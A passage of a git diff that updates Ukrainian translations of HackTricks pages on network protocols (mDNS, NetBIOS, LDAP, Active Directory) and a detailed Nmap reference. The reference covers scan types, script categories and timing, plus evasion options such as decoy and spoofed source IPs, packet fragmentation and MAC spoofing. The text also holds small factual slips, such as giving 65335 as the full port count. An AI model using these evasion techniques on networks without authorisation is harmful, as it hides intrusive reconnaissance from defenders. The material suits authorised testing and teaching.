+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index bd2fd1069..a69221034 100644 --- a/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -1,16 +1,17 @@ +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Школа хакінгу HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Школа хакінгу HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} ## Multicast DNS (mDNS) @@ -18,7 +19,7 @@ Протокол **mDNS** призначений для вирішення IP-адрес в межах невеликих, локальних мереж без відведеного сервера імен. Він працює шляхом мультикастингу запиту в межах підмережі, що спонукає хост з вказаним ім'ям відповісти своєю IP-адресою. Після цього всі пристрої в підмережі можуть оновити свої кеші mDNS цією інформацією. Ключові моменти для уваги: -- **Відмова від доменного імені**: Хост може звільнити своє доменне ім'я, відправивши пакет з TTL, рівним нулю. +- **Відмова від доменного імені**: Хост може звільнити своє доменне ім'я, відправивши пакет з TTL рівним нулю. - **Обмеження використання**: mDNS зазвичай вирішує імена, що закінчуються на **.local**. Конфлікти з не-mDNS хостами в цьому домені вимагають налаштувань мережі. - **Мережеві деталі**: - Ethernet multicast MAC-адреси: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`. @@ -50,25 +51,26 @@ RADIUS (Remote Authentication Dial-In User Service) - це протокол до SMB - це протокол для обміну файлами, принтерами та портами. Він працює безпосередньо через TCP (порт 445) або через NetBIOS через TCP (порти 137, 138). Ця подвійна сумісність покращує підключення до різних пристроїв. ### NetBIOS (Network Basic Input/Output System) -NetBIOS керує мережевими сеансами та з'єднаннями для обміну ресурсами. Він підтримує унікальні імена для пристроїв та групові імена для кількох пристроїв, що дозволяє спрямоване або мовчазне розповсюдження повідомлень. Комунікація може бути безз'єднаною (без підтвердження) або з'єднаною (заснованою на сеансах). Хоча NetBIOS традиційно працює через протоколи, такі як IPC/IPX, він часто використовується через TCP/IP. NetBEUI, пов'язаний протокол, відомий своєю швидкістю, але також був досить розгалуженим через трансляцію. +NetBIOS керує мережевими сеансами та з'єднаннями для обміну ресурсами. Він підтримує унікальні імена для пристроїв та групові імена для кількох пристроїв, що дозволяє спрямоване або мовчазне розповсюдження повідомлень. Зв'язок може бути безпосереднім (без підтвердження) або орієнтованим на з'єднання (на основі сеансів). Хоча NetBIOS традиційно працює через протоколи, такі як IPC/IPX, він часто використовується через TCP/IP. NetBEUI, пов'язаний протокол, відомий своєю швидкістю, але був досить розгалуженим через трансляцію. ## LDAP (Lightweight Directory Access Protocol) -LDAP - це протокол, який дозволяє керувати та отримувати доступ до інформації каталогу через TCP/IP. Він підтримує різні операції для запитування та зміни інформації каталогу. Головним чином він використовується для доступу та підтримки розподілених служб каталогів, що дозволяє взаємодію з базами даних, призначеними для комунікації LDAP. +LDAP - це протокол, який дозволяє керувати та отримувати доступ до інформації каталогу через TCP/IP. Він підтримує різні операції для запитування та зміни інформації каталогу. Головним чином він використовується для доступу та підтримки розподілених служб інформації каталогу, що дозволяє взаємодію з базами даних, призначеними для зв'язку через LDAP. ## Active Directory (AD) -Active Directory - це мережева база даних, що містить об'єкти, такі як користувачі, групи, привілеї та ресурси, що сприяє централізованому управлінню мережевими сутностями. AD організовує свої дані у ієрархічну структуру доменів, яка може охоплювати сервери, групи та користувачів. Піддомени дозволяють подальшу сегментацію, кожен з них може підтримувати власний сервер та базу користувачів. Ця структура централізує управління користувачами, надаючи або обмежуючи доступ до мережевих ресурсів. Запити можуть бути зроблені для отримання конкретної інформації, такої як контактні дані, або для пошуку ресурсів, таких як принтери, в межах домену. +Active Directory - це мережева база даних, яка містить об'єкти, такі як користувачі, групи, привілеї та ресурси, що сприяє централізованому управлінню мережевими сутностями. AD організовує свої дані у ієрархічну структуру доменів, яка може охоплювати сервери, групи та користувачів. Піддомени дозволяють подальшу сегментацію, кожен з них може підтримувати власний сервер та базу користувачів. Ця структура централізує управління користувачами, надаючи або обмежуючи доступ до мережевих ресурсів. Можна робити запити для отримання конкретної інформації, такої як контактні дані, або для знаходження ресурсів, таких як принтери, у межах домену. +{% hint style="success" %} +Вивчайте та практикуйте хакінг AWS: [**Школа хакінгу HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте хакінг GCP: [**Школа хакінгу HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити вашу **компанію в рекламі HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index 25658b48f..94c105784 100644 --- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -1,18 +1,23 @@ -# Зведення по Nmap (ESP) +# Зведення Nmap (ESP) + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS: [**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)! +Підтримайте HackTricks -Інші способи підтримки HackTricks: - -* Якщо ви хочете побачити свою **компанію в рекламі на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДТРИМКИ**](https://github.com/sponsors/carlospolop)! -* Отримайте [**офіційний мерч PEASS & HackTricks**](https://peass.creator-spring.com) -* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family) -* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**. +* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)! +* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Поширюйте хакерські трюки, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв GitHub.
+{% endhint %} + +
+ +{% embed url="https://websec.nl/" %} ``` nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 ``` @@ -20,7 +25,7 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 ### IP-адреси для сканування -* **`,`:** Вказує прямі IP-адреси +* **`,`:** Вказує прямо ip-адреси * **`-iL `:** list\_IPs * **`-iR `**: Кількість випадкових IP-адрес, можна виключити можливі IP-адреси за допомогою `--exclude ` або `--excludefile `. @@ -28,49 +33,51 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 За замовчуванням Nmap запускає фазу виявлення, що складається з: `-PA80 -PS443 -PE -PP` -* **`-sL`**: Неінвазивний, перераховує цілі, виконуючи запити **DNS** для вирішення імен. Корисно знати, чи всі IP-адреси на www.prueba.es/24 є нашими цілями. -* **`-Pn`**: **Без пінгу**. Це корисно, якщо ви знаєте, що всі вони активні (якщо ні, ви можете втратити багато часу, але ця опція також може давати помилкові відповіді, що вони не активні), це запобігає фазі виявлення. -* **`-sn`** : **Без сканування портів**. Після завершення фази розвідки не сканує порти. Це відносно приховано і дозволяє невелике сканування мережі. З привілеями він відправляє ACK (-PA) на 80, SYN(-PS) на 443 та запит на ехо та запит на мітку часу, без привілеїв завжди завершує з'єднання. Якщо ціль - мережа, використовується тільки ARP(-PR). Якщо використовується з іншою опцією, відкидаються тільки пакети іншої опції. +* **`-sL`**: Неінвазивний, перераховує цілі, виконуючи запити **DNS** для вирішення імен. Корисно знати, чи всі IP-адреси наші цілі, наприклад www.prueba.es/24. +* **`-Pn`**: **Без пінгу**. Корисно, якщо ви знаєте, що всі вони активні (якщо ні, ви можете втратити багато часу, але ця опція також може давати помилкові відповіді, що вони не активні), це запобігає фазі виявлення. +* **`-sn`** : **Без сканування портів**. Після завершення фази розвідки не сканує порти. Це відносно приховане і дозволяє невелике сканування мережі. З привілеями він відправляє ACK (-PA) на 80, SYN(-PS) на 443 та запит на ехо та запит на мітку часу, без привілеїв завжди завершує підключення. Якщо ціль - мережа, використовується тільки ARP(-PR). Якщо використовується з іншою опцією, відкидаються тільки пакети іншої опції. * **`-PR`**: **Пінг ARP**. Використовується за замовчуванням при аналізі комп'ютерів у нашій мережі, він швидше, ніж використання пінгів. Якщо ви не хочете використовувати пакети ARP, використовуйте `--send-ip`. -* **`-PS `**: Він відправляє пакети SYN, на які, якщо відповідає SYN/ACK, він відкритий (на який відповідає RST, щоб не завершити з'єднання), якщо відповідає RST, він закритий, а якщо не відповідає, він недосяжний. У випадку відсутності привілеїв автоматично використовується повне з'єднання. Якщо порти не вказані, він відправляє їх на 80. +* **`-PS `**: Він відправляє пакети SYN, на які, якщо відповідає SYN/ACK, він відкритий (на який відповідає RST, щоб не завершити підключення), якщо відповідає RST, він закритий, якщо не відповідає, він недосяжний. У випадку відсутності привілеїв автоматично використовується загальне підключення. Якщо порти не вказані, він відправляє їх на 80. * **`-PA `**: Те саме, що й попереднє, але з ACK, поєднуючи обидва, дає кращі результати. -* **`-PU `**: Мета полягає в тому, що вони відправляються на порти, які очікуються бути закритими. Деякі брандмауери перевіряють тільки TCP-з'єднання. Якщо він закритий, відповідається з недоступним портом, якщо відповідається іншим icmp або не відповідає, він залишається як недосяжний пункт призначення. -* **`-PE, -PP, -PM`** : ICMP ПІНГИ: відповідь на ехо, мітка часу та маска адреси. Вони відправляються для визначення активності цілі. -* **`-PY`**: Відправляє SCTP INIT-запити на 80 за замовчуванням, INIT-ACK(відкритий) або ABORT(закритий) або нічого або ICMP недоступний(неактивний) можуть бути відповіддю. -* **`-PO `**: У заголовках вказується протокол, за замовчуванням 1(ICMP), 2(IGMP) та 4(Encap IP). Для протоколів ICMP, IGMP, TCP (6) та UDP (17) відправляються заголовки протоколів, для решти відправляється тільки IP-заголовок. Мета полягає в тому, що через неправильність заголовків відповіді на недосяжність протоколу або відповіді того ж протоколу відповідають, щоб знати, чи він активний. +* **`-PU `**: Мета полягає в тому, що вони відправляються на порти, які очікуються бути закритими. Деякі брандмауери перевіряють тільки TCP-підключення. Якщо він закритий, відповідається з недоступним портом, якщо відповідається іншим icmp або не відповідає, він залишається як недосяжний пункт призначення. +* **`-PE, -PP, -PM`** : ICMP ПІНГИ: відповідь на ехо, мітка часу та маска адреси. Вони запускаються для визначення активності цілі. +* **`-PY`**: Відправляє SCTP INIT запити на 80 за замовчуванням, INIT-ACK(відкритий) або ABORT(закритий) або нічого або ICMP недоступний(неактивний) може бути відповіддю. +* **`-PO `**: У заголовках вказується протокол, за замовчуванням 1(ICMP), 2(IGMP) та 4(Encap IP). Для протоколів ICMP, IGMP, TCP (6) та UDP (17) відправляються заголовки протоколів, для решти відправляється тільки IP-заголовок. Мета полягає в тому, що через неправильність заголовків відповіді на недосяжний протокол або відповіді того ж протоколу відповідають, щоб знати, чи він активний. * **`-n`**: Без DNS * **`-R`**: DNS завжди ### Техніки сканування портів -* **`-sS`**: Не завершує з'єднання, тому не залишає слідів, дуже добре, якщо можна використовувати. (привілеї) Це використовується за замовчуванням. -* **`-sT`**: Завершує з'єднання, тому залишає слід, але може бути використаний безпечно. За замовчуванням без привілеїв. -* **`-sU`**: Повільніше, для UDP. Головним чином: DNS(53), SNMP(161,162), DHCP(67 та 68), (-sU53,161,162,67,68): відкритий(відповідь), закритий(порт недоступний), фільтрований (інший ICMP), відкритий/фільтрований (нічого). У випадку відкритий/фільтрований, -sV відправляє численні запити для виявлення будь-яких версій, які підтримує nmap і може виявити справжній стан. Це значно збільшує час. -* **`-sY`**: Протокол SCTP не може встановити з'єднання, тому немає журналів, працює як -PY -* **`-sN,-sX,-sF`:** Null, Fin, Xmas, вони можуть проникнути через деякі брандмауери та витягти інформацію. Вони базуються на тому, що машини, що відповідають стандартам, повинні відповідати RST на всі запити, які не мають піднятих прапорців SYN, RST або ACK: відкритий/фільтрований(нічого), закритий(RST), фільтрований (ICMP недоступний). Ненадійний на Windows, CIsco, BSDI та OS/400. На unix так. -* **`-sM`**: Сканування Maimon: Відправляє прапорці FIN та ACK, використовується для BSD, наразі поверне все як закрите. -* **`-sA, sW`**: ACK та Window, використовується для виявлення брандмауерів, щоб знати, чи порти фільтруються чи ні. -sW дійсно розрізняється між відкритим/закритим, оскільки відкриті відповідають із різним значенням вікна: відкритий (RST з вікном, відмінним від 0), закритий (RST вікно = 0), фільтрований (ICMP недоступний або нічого). Не всі комп'ютери працюють так, тому якщо все закрите, воно не працює, якщо деякі відкриті, воно працює добре, і якщо багато відкритих і декілька закритих, воно працює навпаки. +* **`-sS`**: Не завершує підключення, тому не залишає слідів, дуже добре, якщо можна використовувати. (привілеї) Це те, що використовується за замовчуванням. +* **`-sT`**: Завершує підключення, тому залишає слід, але можна використовувати впевнено. За замовчуванням без привілеїв. +* **`-sU`**: Повільніше, для UDP. Головним чином: DNS(53), SNMP(161,162), DHCP(67 та 68), (-sU53,161,162,67,68): відкритий(відповідь), закритий(порт недосяжний), фільтрований (інший ICMP), відкритий/фільтрований (нічого). У випадку відкритий/фільтрований, -sV відправляє численні запити для виявлення будь-якої з версій, яку підтримує nmap і може виявити справжній стан. Це значно збільшує час. +* **`-sY`**: Протокол SCTP не може встановити підключення, тому журналів немає, працює як -PY +* **`-sN,-sX,-sF`:** Null, Fin, Xmas, вони можуть проникнути через деякі брандмауери та отримати інформацію. Вони базуються на тому, що машини, що відповідають стандартам, повинні відповідати RST на всі запити, які не мають піднятих SYN, RST або ACK прапорів: відкритий/фільтрований(нічого), закритий(RST), фільтрований (ICMP недосяжний). Ненадійні на Windows, CIsco, BSDI та OS/400. На unix так. +* **`-sM`**: Сканування Maimon: Відправляє прапори FIN та ACK, використовується для BSD, наразі поверне все як закрите. +* **`-sA, sW`**: ACK та Window, використовується для виявлення брандмауерів, щоб знати, чи порти фільтровані чи ні. -sW розрізняє між відкритим/закритим, оскільки відкриті відповідають із різним значенням вікна: відкритий (RST з вікном, відмінним від 0), закритий (RST вікно = 0), фільтрований (ICMP недосяжний або нічого). Не всі комп'ютери працюють так, тому якщо все закрите, воно не працює, якщо деякі відкриті, воно працює добре, і якщо багато відкритих і декілька закритих, воно працює навпаки. * **`-sI`:** Сканування в режимі очікування. У випадках, коли є активний брандмауер, але ми знаємо, що він не фільтрує до певного IP (або коли ми просто хочемо залишитися анонімними), ми можемо використовувати сканер-зомбі (він працює для всіх портів), щоб знайти можливі зомбі, ми можемо використовувати скрипт ipidseq або експлойт auxiliary/scanner/ip/ipidseq. Цей сканер базується на номері IPID пакетів IP. * **`--badsum`:** Він відправляє неправильну суму, комп'ютери відкинуть пакети, але брандмауери можуть відповісти чимось, використовується для виявлення брандмауерів. -* **`-sZ`:** "Дивний" SCTP сканер, при відправці запитів з фрагментами cookie echo вони повинні бути відкинуті, якщо відкрито або відповідають ABORT, якщо закрито. Він може пройти через брандмауери, які не проходять через ініціалізацію, погано те, що він не розрізняється між фільтрованим та відкритим. -* **`-sO`:** Сканування протоколу Ip. Відправляє неправильні та порожні заголовки, в яких іноді навіть протокол не може бути визначений. Якщо доходить недоступний протокол ICMP, він закритий, якщо доходить недоступний порт, він відкритий, якщо доходить інша помилка, фільтрований, якщо нічого не доходить, відкритий|фільтрований. -* **`-b `:** FTPhost--> Використовується для сканування хоста з іншого, це робиться, підключаючись до ftp іншої машини та просить його надсилати файли на порти, які ви хочете сканувати з іншої машини, згідно з відповідями ми дізнаємося, чи вони відкриті чи ні. \[\:\@]\\[:\] Майже всі сервери ftp більше не дозволяють це робити, тому це має мало практичного застосування. +* **`-sZ`:** "Дивний" SCTP сканер, при відправці запитів з фрагментами cookie echo вони повинні бути відкинуті, якщо відкрито або відповідати ABORT, якщо закрито. Він може пройти через брандмауери, які не проходять через ініціювання, погано те, що він не розрізняється між фільтрованим та відкритим. +* **`-sO`:** Сканування протоколу Ip. Відправляє неправильні та порожні заголовки, в яких іноді навіть протокол не можна відрізнити. Якщо доходить недосяжний протокол ICMP, він закритий, якщо доходить недосяжний порт, він відкритий, якщо доходить інша помилка, фільтрований, якщо нічого не доходить, відкритий|фільтрований. +* **`-b `:** FTPhost--> Використовується для сканування хоста з іншого, це робиться шляхом підключення ftp іншої машини та запиту відправки файлів на порти, які ви хочете сканувати з іншої машини, згідно з відповідями ми дізнаємося, чи вони відкриті чи ні. \[\:\@]\\[:\] Майже всі ftp-сервери більше не дозволяють це робити, тому це має мало практичного застосування. ### **Централізувати аналіз** -**-p:** Використовується для вказівки портів для сканування. Для вибору 65335: **-p-** або **-p all**. Nmap має внутрішню класифікацію за популярністю. За замовчуванням використовує 1000 головних. З **-F** (швидке сканування) аналізує 100 головних. З **--top-ports \** Аналізує цю кількість головних (від 1 до 65335). Перевіряє порти у випадковому порядку, щоб цього не сталося **-r**. Також ми можемо вибрати порти: 20-30,80,443,1024- Це останнє означає, що перевіряється після 1024. Ми також можемо групувати порти за протоколами: U:53,T:21-25,80,139,S:9. Ми також можемо вибрати діапазон серед популярних портів nmap: -p \[-1024] аналізує до 1024 з тих, що включені в nmap-services. **--port-ratio \** Аналізує найбільш поширені порти за відношенням, я +**-p:** Вказує порти для сканування. Для вибору 65335: **-p-** або **-p all**. Nmap має внутрішню класифікацію за популярністю. За замовчуванням використовує 1000 головних. З **-F** (швидке сканування) аналізує 100 головних. З **--top-ports \** Аналізує цю кількість головних (від 1 до 65335). Перевіряє порти у випадковому порядку, щоб цього не сталося **-r**. Також можна вибрати порти: 20-30,80,443,1024- Це означає, що перевіряється від 1024 і вище. Також можна групувати порти за протоколами: U:53,T:21-25,80,139,S:9. Також можна вибрати діапазон серед популярних портів nmap: -p \[-1024] аналізує до 1024 з тих, що включені в nmap-services. **--port-ratio \** Аналізує найбільш поширені порти за відношенням, яке повинно бути від 0 до 1 + +**-sV** Сканування версій, можна регулювати **--osscan-guess** Коли виявлення os не є ідеальним, це змушує його працювати більше **Сценарії** \--script _\_|_\_|_\_|_\_\[,...] -Для використання за замовчуванням використовується -sC або --script=default +Для використання типових достатньо -sC або --script=default Існують такі типи: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln * **Auth:** виконує всі доступні сценарії для аутентифікації -* **Default:** виконує базові сценарії за замовчуванням інструменту +* **Default:** виконує типові сценарії за замовчуванням інструменту * **Discovery:** отримує інформацію про ціль або жертву * **External:** сценарій для використання зовнішніх ресурсів * **Intrusive:** використовує сценарії, які вважаються нав'язливими для жертви або цілі @@ -85,9 +92,9 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 **nmap --script-help="not intrusive" -> Усі, крім цих** -**nmap --script-help="default or safe" -> Ті, які є в одному або в іншому або в обох** +**nmap --script-help="default or safe" -> Ті, що є в одному або в іншому або в обох** -**nmap --script-help="default and safe" --> Ті, які є в обох** +**nmap --script-help="default and safe" --> Ті, що є в обох** **nmap --script-help="(default or safe or intrusive) and not http-\*"** @@ -101,15 +108,15 @@ nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 \--script-updatedb -**Для використання сценарію просто вкажіть: namp --script Назва\_сценарію ціль** --> При вказанні сценарію буде виконано як сценарій, так і сканер, тому можна додати параметри сканера, можна додати **“safe=1”** для виконання лише безпечних сценаріїв. +**Для використання сценарію просто вкажіть: namp --script Назва\_сценарію ціль** --> При вказанні сценарію виконується як сценарій, так і сканер, тому можна додати **“safe=1”** для виконання лише безпечних сценаріїв. **Контроль часу** **Nmap може змінювати час у секундах, хвилинах, мс:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing. -Nmap розділяє загальну кількість хостів для сканування на групи та аналізує ці групи блоками, поки всі вони не будуть проаналізовані, не переходить до наступного блоку (і користувач також не отримує жодного оновлення, поки блок не буде проаналізований), таким чином, для nmap краще використовувати великі групи. За замовчуванням для класу C використовується 256. +Nmap розділяє загальну кількість хостів для сканування на групи та аналізує ці групи блоками, так що поки всі вони не будуть проаналізовані, він не переходить до наступного блоку (і користувач також не отримує жодного оновлення, поки блок не буде проаналізований). Таким чином, для nmap оптимальніше використовувати великі групи. За замовчуванням у класі C використовується 256. -Це можна змінити за допомогою\*\*--min-hostgroup\*\* _**\**_**;** **--max-hostgroup** _**\**_ (Adjust parallel scan group sizes) +Це можна змінити за допомогою\*\*--min-hostgroup\*\* _**\**_**;** **--max-hostgroup** _**\**_ (Налаштування паралельних розмірів груп сканування) Можна контролювати кількість сканерів, які працюють паралельно, але краще цього не робити (nmap вже має автоматичний контроль на основі стану мережі): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ @@ -143,21 +150,21 @@ Nmap розділяє загальну кількість хостів для с Блокують порти та аналізують пакети. -**-f** Для фрагментації пакетів, за замовчуванням фрагментує їх на 8 байтів після заголовка, для вказання розміру використовуємо ..mtu (з цим не використовувати -f), зміщення повинно бути кратним 8. **Сканери версій та сценарії не підтримують фрагментацію** +**-f** Для фрагментації пакетів, за замовчуванням вони фрагментуються на 8 байтів після заголовка, щоб вказати розмір використовуємо ..mtu (з цим не використовувати -f), зміщення повинно бути кратним 8. **Сканери версій та сценарії не підтримують фрагментацію** -**-D decoy1,decoy2,ME** Nmap відправляє сканери, але з іншими IP-адресами як джерело, таким чином, ви приховуєтеся. Якщо ви включаєте ME у списку, nmap розмістить вас там, краще включити 5 або 6 перед вами, щоб повністю приховатися. Можна створювати випадкові IP-адреси з RND:\ Для генерації \ випадкових IP-адрес. Не працюють з виявленням версій без підключення TCP. Якщо ви знаходитесь у мережі, вам слід використовувати активні IP-адреси, оскільки в іншому випадку буде дуже легко визначити, що ви єдиний активний. +**-D decoy1,decoy2,ME** Nmap відправляє сканери, але з іншими IP-адресами як джерело, таким чином, ви приховуєтеся. Якщо ви включаєте ME у списку, nmap розмістить вас там, краще вказати 5 або 6 перед вами, щоб повністю приховатися. Можна створювати випадкові IP-адреси з RND:\<номер> Для генерації \<номер> випадкових IP-адрес. Не працюють з виявленням версій без з'єднання TCP. Якщо ви в мережі, вам варто використовувати активні IP-адреси, інакше буде дуже легко визначити, що ви єдиний активний. -Для використання випадкових IP-адрес: nmap-D RND: 10 Ціль_IP +Для використання випадкових IP-адрес: nmap-D RND: 10 Ip\_ціль -**-S IP** Якщо Nmap не визначає вашу IP-адресу, вам потрібно вказати її самостійно. Також може використовуватися для створення враження, що інша ціль сканує їх. +**-S IP** Якщо Nmap не визначає вашу IP-адресу, вам потрібно вказати її. Також може використовуватися для створення враження, що інша ціль сканує їх. -**-e \** Для вибору інтерфейсу +**-e \** Вибір інтерфейсу -Багато адміністраторів залишають відкритими вхідні порти, щоб все працювало належним чином, і їм легше знайти інше рішення. Це можуть бути порти DNS або FTP... для пошуку цієї вразливості nmap включає: **--source-port** _**\**_**;-g** _**\**_ _Еквівалентні_ +Багато адміністраторів залишають відкритими вхідні порти, щоб все працювало належним чином і їм було легше знайти інше рішення. Це можуть бути порти DNS або FTP... для пошуку цієї вразливості nmap включає: **--source-port** _**\**_**;-g** _**\**_ _Еквівалентні_ -**--data** _**\**_ Для відправлення шістнадцяткового тексту: --data 0xdeadbeef and --data \xCA\xFE\x09 +**--data** _**\**_ Для відправки шістнадцяткового тексту: --data 0xdeadbeef and --data \xCA\xFE\x09 -**--data-string** _**\**_ Для відправлення звичайного тексту: --data-string "Scan conducted by Security Ops, extension 7192" +**--data-string** _**\**_ Для відправки звичайного тексту: --data-string "Scan conducted by Security Ops, extension 7192" **--data-length** _**\**_ Nmap відправляє лише заголовки, з цим ми змушуємо його додати до них певну кількість байтів (які будуть генеруватися випадково) @@ -170,7 +177,7 @@ Nmap розділяє загальну кількість хостів для с **--randomize-hosts** Щоб атака була менш очевидною **--spoof-mac** _**\**_ Для зміни MAC-адреси приклади: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco -**--proxies** _**\<Список URL-адресів проксі>**_ Для використання проксі, іноді проксі не утримує стільки відкритих з'єднань, які хоче nmap, тому потрібно змінити паралельність: --max-parallelism +**--proxies** _**\<Список URL-адресів проксі>**_ Для використання проксі, іноді проксі не утримує стільки відкритих з'єднань, скільки хоче nmap, тому потрібно змінити паралельність: --max-parallelism **-sP** Для виявлення хостів у мережі, в якій ми знаходимося, за допомогою ARP @@ -194,13 +201,13 @@ Nmap розділяє загальну кількість хостів для с **--reason** Причина хоста та стан -**--stats-every time** Кожній час повідомляє, як справи +**--stats-every time** Кожен час показує, як йде процес **--packet-trace** Для перегляду вихідних пакетів можна вказати фільтри, такі як: --version-trace або --script-trace **--open** показує відкриті, відкриті|фільтровані та невідфільтровані -**--resume file** Виводить підсумок +**--resume file** Резюме **Різне** @@ -254,3 +261,22 @@ wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar Крім того, зонди, які не мають спеціально визначеного значення **`servicewaitms`**, використовують значення за замовчуванням **`5000`**. Тому ми можемо або додати значення до кожного зонда, або **скомпілювати nmap** самостійно та змінити значення за замовчуванням у [**service\_scan.h**](https://github.com/nmap/nmap/blob/master/service\_scan.h#L79). Якщо ви не хочете змінювати значення **`totalwaitms`** та **`tcpwrappedms`** взагалі у файлі `/usr/share/nmap/nmap-service-probes`, ви можете відредагувати [код розбору](https://github.com/nmap/nmap/blob/master/service\_scan.cc#L1358) так, що ці значення у файлі `nmap-service-probes` будуть повністю ігноруватися. + +
+ +{% embed url="https://websec.nl/" %} + +{% hint style="success" %} +Вивчайте та практикуйте взлом AWS:[**Навчання HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Вивчайте та практикуйте взлом GCP: [**Навчання HackTricks GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
